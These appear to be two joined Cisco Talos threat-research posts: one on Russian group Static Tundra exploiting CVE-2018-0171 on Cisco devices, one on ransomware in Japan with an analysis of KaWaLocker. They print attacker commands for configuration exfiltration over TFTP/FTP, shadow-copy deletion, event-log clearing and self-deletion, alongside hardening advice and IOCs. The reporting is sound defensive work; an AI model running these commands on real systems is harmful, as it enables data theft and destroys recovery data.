Since Static Tundra was first observed in 2015, the group has targeted organizations in the telecommunications, higher education and manufacturing sectors. Victims are primarily based in Ukraine and allied countries, but also include other entities globally. Talos estimates Static Tundra will continue network intrusion campaigns into organizations that are of strategic interest to Russia, specifically manufacturing and higher education, and targets of political interest will likely continue to include Ukraine and its allies.

While this blog focuses on Static Tundra's ongoing campaign against network devices, many other state-sponsored actors also covet the access these devices afford, as we have warned many times over the years. Organizations should be aware that other advanced persistent threats (APTs) are likely prioritizing carrying out similar operations as well.

**Targeting and victimology**

Static Tundra has been observed as primarily targeting organizations in the telecommunications, higher education and manufacturing sectors, pivoting over time in alignment with shifts in Russian strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa and Europe.

One of the clearer targeting shifts we observed was that Static Tundra’s operations against entities in Ukraine escalated at the start of the Russia-Ukraine war, and have remained high since then. Static Tundra was observed compromising Ukrainian organizations in multiple verticals, as opposed to previously more limited, selective compromises typically being associated with this threat actor.

**Tactics, techniques and procedures (TTPs)**

We assess that Static Tundra’s two primary operational objectives are 1) compromising network devices to gather sensitive device configuration information that can be leveraged to support future operations, and 2) establishing persistent access to network environments to support long-term espionage in alignment with Russian strategic interests. Because of the large global presence of Cisco network infrastructure and the potential access it affords, the group focuses heavily on the exploitation of these devices and possibly also the development of tools to interact with and persist on these devices. Static Tundra utilizes bespoke tooling that prioritizes persistence and stealth to achieve these objectives. The tooling and techniques target old and unpatched edge devices.

**Initial access**

Since at least 2021, Static Tundra has been observed aggressively exploiting CVE-2018-0171, a known and patched vulnerability in Cisco IOS software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.

Cisco issued a patch for CVE-2018-0171 in 2018. As advised previously by Cisco, customers are strongly urged to apply the patch immediately given active and ongoing exploitation of the vulnerability by sophisticated state-sponsored or state-aligned active persistent threat (APT) groups. Devices that are beyond end of life and cannot support the patch require additional security precautions as detailed in the 2018 security advisory. **Unpatched devices with Smart Install enabled will** **continue to be vulnerable to these and other attacks unless and until customers take action****.**

Talos assesses with moderate confidence that Static Tundra leverages bespoke tooling to automate the exploitation of CVE-2018-0171 and subsequent configuration exfiltration against a predefined set of target IP addresses, likely gathered using publicly available scan data from a service such as Shodan or Censys. The process is similar to those that have been reported publicly in red teaming blogs and similar publications.

After gaining initial entry via exploitation of the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that will modify the running configuration and enable the local Trivial File Transfer Protocol (TFTP) server:

tftp-server nvram:startup-config

This then allows Static Tundra to make a follow-up connection to the newly spawned TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or Simple Network Management Protocol (SNMP) community strings that can then be leveraged for more direct access to the system.

Static Tundra has also been observed making initial access to devices via SNMP, leveraging a community string that was either compromised in a previous attack or guessed. In some cases, the group used insecure community strings of "anonymous" and "public" with read-write permissions.

**Execution**

Upon gaining initial access to a target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of the SNMP traffic. This technique allows the threat actor to obfuscate their infrastructure and bypass access control lists (ACLs), as the SNMP protocol does not use session establishment. SNMP offers a variety of options for further execution on a compromised device, such as executing commands directly, modifying the running configuration and extracting the current running configuration or startup configuration.

Static Tundra leverages SNMP to send instructions to download a text file from a remote server and append it to the running configuration. This can allow for additional means of access via newly created local user accounts in conjunction with enabling remote services including TELNET.

**Persistence**

Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems over the course of multiple years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community read-write strings.

Static Tundra has been observed leveraging a Cisco IOS firmware implant known as SYNful Knock to achieve persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto the compromised device. This provides a stealthy means of access that will persist through reboots. Remote access to the device can then be achieved by sending a specifically crafted TCP SYN packet, commonly referred to as a “magic packet.” Additional information, including a full technical write-up, can be found in a 2015 blog published by Mandiant with additional details from a 2015 Cisco blog. Additionally, Talos has published a script that can be used to scan for and detect the SYNful Knock implant.

**Defense evasion**

Static Tundra has been observed modifying TACACS+ configuration on compromised devices, hindering remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to permit access from specific IP addresses or ranges under their control.

**Discovery**

Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest. Once inside a target environment, Static Tundra relies heavily on native commands, such as “show cdp neighbors”, to reveal additional systems of interest within the target environment. This presents a relatively stealthy way to identify further targets without the need for active scanning.

**Collection**

One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective. To achieve this, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed collecting and exfiltrating NetFlow data on compromised systems, revealing source and destination information on streams of potential interest.

**Exfiltration**

Static Tundra exfiltrates configuration information through a variety of means, including inbound TFTP connections via the Smart Install exploitation procedure mentioned in the Initial Access section, outbound TFTP or FTP connections from the compromised device to attacker-controlled infrastructure, and inbound SNMP connections using the copy configuration process.

Static Tundra leverages bespoke SNMP tooling and functionality provided by the CISCO-CONFIG-COPY-MIB to exfiltrate configurations from compromised devices via either TFTP or Remote Copy Protocol (RCP).

Static Tundra has been observed using the following commands to exfiltrate configuration files via TFTP and FTP:

do show running-config | redirect tftp://:/conf\_bckp
copy running-config ftp://user:pass@/output.txt

**Detection**

Talos recommends taking the following steps to identify suspicious activity that may be related to this campaign:

*   Conduct comprehensive configuration management (including auditing), in line with best practices.
*   Conduct comprehensive authentication, authorization and command issuance monitoring.
*   Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events, or a gap in logged activity.
*   Monitor your environment for unusual changes in behavior or configuration.
*   Profile (fingerprint via NetFlow and port scanning) network devices for a shift in surface view, including new ports opening/closing and traffic to/from (not traversing).
*   Where possible, develop NetFlow visibility to identify unusual volumetric changes.
*   Look for non-empty or unusually large .bash\_history files.

Additional identification and detection can be performed using the Cisco forensic guides.

**Preventative measures**

The following strong recommendations apply to entities in all sectors.

*   **Cisco-specific measures**
    *   Apply the patch for CVE-2018-0171.
        *   Disable Smart Install as indicated in the advisory if patching is not an option.
    *   Leverage Cisco Hardening Guides when configuring devices.
    *   Disable telnet and ensure it is not available on any of the Virtual Teletype (VTY) lines on Cisco devices by configuring all VTY stanzas with “transport input ssh” and “transport output none”.
    *   Disable Cisco’s Smart Install service using “no vstack” for any device where application of the available patch for CVE 2018-0171 is infeasible, and develop end-of-life management plans for technology too old to patch.
    *   Utilize Type 8 passwords for local account credential configuration.
    *   Utilize Type 6 for TACACS+ key configuration.
*   **General measures**
    *   Rigorously adhere to security best practices, including updating, access controls, user education and network segmentation.
    *   Stay up to date on security advisories from the U.S. government and industry and consider suggested configuration changes to mitigate described issues.
    *   Update devices as aggressively as possible. This includes patching current hardware and software against known vulnerabilities and replacing end-of- life hardware and software.
        *   Select complex passwords and community strings and avoid default credentials.
    *   Use multi-factor authentication (MFA).
    *   Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
    *   Lock down and aggressively monitor credential systems, such as TACACS+ and any jump hosts.
    *   Utilize AAA to deny configuration modifications of key device protections (e.g., local accounts, TACACS+, RADIUS).
    *   Prevent and monitor for exposure of administrative or unusual interfaces (e.g., SNMP, SSH, HTTP, HTTPS).
    *   Disable all non-encrypted web management capabilities.
    *   Verify existence and correctness of access control lists for all management protocols (e.g., SNMP, SSH, Netconf, etc.).
    *   Store configurations centrally and push to devices. Do NOT allow devices to be the trusted source of truth for their configurations.

**Indicators of compromise (IOCs)**

**Indicator**

**Type**

**Known Activity**

185.141.24\[.\]222

IP Address

2023/03/23

185.82.202\[.\]34

IP Address

2025/01/15 – 2025/02/28

185.141.24\[.\]28

IP Address

2024/10/01 – 2025/07/03

185.82.200\[.\]181

IP Address

2024/10/01 – 2024/11/15

Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices

Ransomware attackers continue to primarily target small and medium-sized manufacturing businesses in Japan.

Tuesday, August 19, 2025 06:00

*   In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year.
*   Ransomware attackers continue to primarily target small and medium-sized enterprises in Japan. The most affected industry remains manufacturing, unchanged from last year.
*   The ransomware group causing the most damage in Japan is "Qilin."
*   In late June, a new ransomware group called "Kawa4096" emerged and might have attacked two Japanese companies.

**Victimized companies**

Figure 1 summarizes the ransomware incidents involving Japanese domestic companies, including overseas branches and subsidiaries, from January 1 to June 30, 2025. According to the Cisco Talos investigation, there were 68 ransomware cases affecting organizations in Japan during this period. Sources include Cisco telemetry, official statements from affected companies, news reports and data from ransomware leak sites. Compared to 48 cases during the same period last year, this represents an approximately 1.4-fold increase. The number of incidents per month ranged from a minimum of 4 to a maximum of 16, with an average of about 11 ransomware attacks per month.

__Figure 1. Ransomware incidents in Japan during the first half of 2025.__

The industries affected remain largely unchanged from the same period last year, with the manufacturing sector experiencing the highest number of incidents at 18.2%, followed by the automotive sector with 5 cases (5.7%), and trading companies, construction and transportation each reporting 4 cases (4.6%).

__Figure 2. Number of victim organizations by industry.__

Regarding the size of the affected organizations, those with capital of less than 100 million yen (or ¥) accounted for the largest share at 38%, followed by those with capital from ¥100 million – 1 billion at 31%. In total, organizations with capital under ¥1 billion made up 69% of all cases, indicating that attackers continue to primarily target small and medium-sized enterprises (see Figure 3).

__Figure 3. Classification of victim organizations by capital size.__

**Types of ransomware most frequently involved in incidents**

LockBit and 8base, which were among the most frequently observed ransomware groups in Japan during the first half of FY2024, ceased their activities following takedown operations by law enforcement in February 2024 and February 2025 respectively, as publicly announced in press releases. As a result, neither group has been observed in 2025.

RansomHub and Hunters International, which ranked among the top ransomware groups last year, are confirmed to still be active in Japan. Notably, the ransomware group Qilin, which had not been reported to have caused any damage in Japan in FY2024, emerged as the most active group in the first half of FY2025, with eight confirmed victim organizations in the country. Qilin has been active since October 2022 and is one of the ransomware groups exerting significant influence both domestically and internationally. The findings from this investigation further suggest that Qilin’s activity is intensifying, making it one of the most critical groups to watch.

Following Qilin, three groups — Lynx, Nightspire, and RansomHub — accounted for three incidents each. Regarding RansomHub, attacks targeting Japan were also confirmed around the same time in 2024. Groups such as Akira, Cicada3301, Gunra, Kawa4096 and Space Bears were each responsible for two incidents. In particular, Kawa4096, which began operations in late June 2025, has targeted Japan from the outset, warranting special attention.

Other groups with one confirmed incident each include Black Suit, CLOP, Devman, Fog and Play, among others.

__Figure 4. Identified ransomware employed in attacks.__

**Spotlight: Kawa4096 ransomware group**

Trustwave published a useful analysis report on Kawa4096 in July 2025.

The ransomware group first posted about a victim organization on its leak site, shown in Figure 5, on June 19, 2025. Subsequently, it disclosed information believed to pertain to attacks on two Japanese companies on June 26 and June 28.

__Figure 5. Kawa4096 leak site.__

**KaWaLocker ransomware deployed by Kawa4096****Config File**

The ransomware used by this group, shown in Figure 6, utilizes the FindResourceW API to load a configuration file from the resource section, as illustrated in Figure 7. The configuration file defines items such as file extensions, directories and specific folders to exclude from encryption; processes and services to terminate; and commands to execute. In the example configuration file shown in the figure, the command to be executed via WMI is defined as <cmd\_post value="calc">, which causes the calculator to launch. Since it only launches the calculator after encryption, it is likely being used to check whether the configuration has been correctly applied. Depending on the value set, arbitrary commands can be executed. In other configuration files, Talos has also confirmed cases where a forced reboot is triggered after encryption using the command shutdown /r /t 0.

__Figure 6. Loading RCDATA101 from the resource section.__

__Figure 7. Part of the configuration file defined in RCDATA101.__

**Creating new file extensions and icons**

The file extension added after encryption is also determined by a value loaded from the resource section, just like the configuration file. Specifically, the ransomware sets the extension using the data starting 8 bytes from the loaded value, and uses the following 9 bytes as the new extension.

__Figure 8. Loading RCDATA102 from the resource section.__

__Figure 9. Part of RCDATA102.__

Once the extension name for the encrypted files is determined, an icon file used after encryption is created at the following path using the CreateFileW API:

C:\Users\Public\Documents\.C3680868C.ico

After that, a new key named “.C3680868C” is created under “HKEY\_LOCAL\_MACHINE\\Software\\Classes” in the registry, with a subkey DefaultIcon whose value is set to the path of the icon mentioned above.

__Figure 10. Registration of a custom file extension.__

__Figure 11. Encrypted file.__

**Types of arguments**

This ransomware checks for the presence of the “all” argument upon execution. (Figure 12)

__Figure 12. Argument check.__

Below is a summary of the three arguments:

*   \-all: Executes the ransomware's processing using multithreading
*   \-d: Encrypts only the specified directory
*   \-dump: Uses the MiniDumpWriteDump API to create a .dmp file containing crash or runtime information in the execution folder

When the -all option is not specified, the ransomware re-executes itself as "%ws" -all using the CreateProcessW API. Additionally, only when -all is not specified, the ransomware creates a Mutex named "SAY\_HI\_2025" using the CreateMutexA API to check whether it is already running.

__Figure 13. Creation of Mutex value.__

**Ransom note**

A ransom note named “!!Restore-My-file-Kavva.txt,” as shown in Figure 13, is created in C:\\ and in each encrypted folder. The ransom note primarily states that the system has been encrypted and that important data has been stolen — characteristics typical of double-extortion ransomware. It warns that if communication is refused, the data will be published. It also specifies the types of data involved, such as employees’ personal information and customer information, making it clear that the attackers are urging the victim to initiate contact with them.

__Figure 14. KaWaLocker ransom note.__

**Data deletion**

After file encryption, the following commands are executed to prevent recovery by deleting backup-related data and traces, such as event logs.

vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete /nointeractive
cmd.exe /c wevtutil cl security | wevtutil cl system | wevtutil cl application

Depending on the configuration settings, the program may also delete itself.

cmd.exe /C ping 127.0.0.1 -n 2 > nul && del /F

**Encryption**

Regarding the encryption method, the chunk size is determined based on the size of the target file, and the number of chunks is decided accordingly. For files smaller than or equal to 10MB, the data is not split for encryption. However, for files larger than 10MB, the file is divided based on varying chunk sizes according to file size, as shown in Figure 15. The base chunk size is defined by the value at offset (a1 + 488), which is set to 0x10000 (64KB). Figure 16 shows the chunk sizes corresponding to different file sizes. This implementation improves encryption performance by accelerating the processing of files.

__Figure 15. Code section that determines the number of chunks based on the file size.__

__Figure 16. File size and chunk size correspondence table.__

Once the chunk count is determined, the target data is encrypted using the Salsa20 stream cipher.

__Figure 17. Encryption method.__

**KaWaLocker 2.0**

We also observed KaWaLocker 2.0 in late July 2025. This indicates that the attackers may become even more active in deploying this malware in the future. One of the main changes is that the ransom note differs from the initial version of KaWaLocker. As shown in Figure 17, the ransom note for KaWaLocker 2.0 includes a newly added email contact.

__Figure 18. KaWaLocker2.0 ransom note.__

Another change is that when examining the configuration of KaWaLocker 2.0, we found that a flag called “hide\_name” had been added.

__Figure 19. KaWaLocker config (left), KaWaLocker 2.0 config (right).__

When this flag is enabled, the file name is changed and encrypted based on the absolute file path using a hash function.

__Figure 20. Encrypted file when the hide\_name flag is enabled.__

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

ClamAV detections are also available for this threat:

*   Win.Ransomware.KaWaLocker-10056371-0
**Indicators of compromise (IOCs)**

The IOCs can also be found in our GitHub repository here.

Tag

#cisco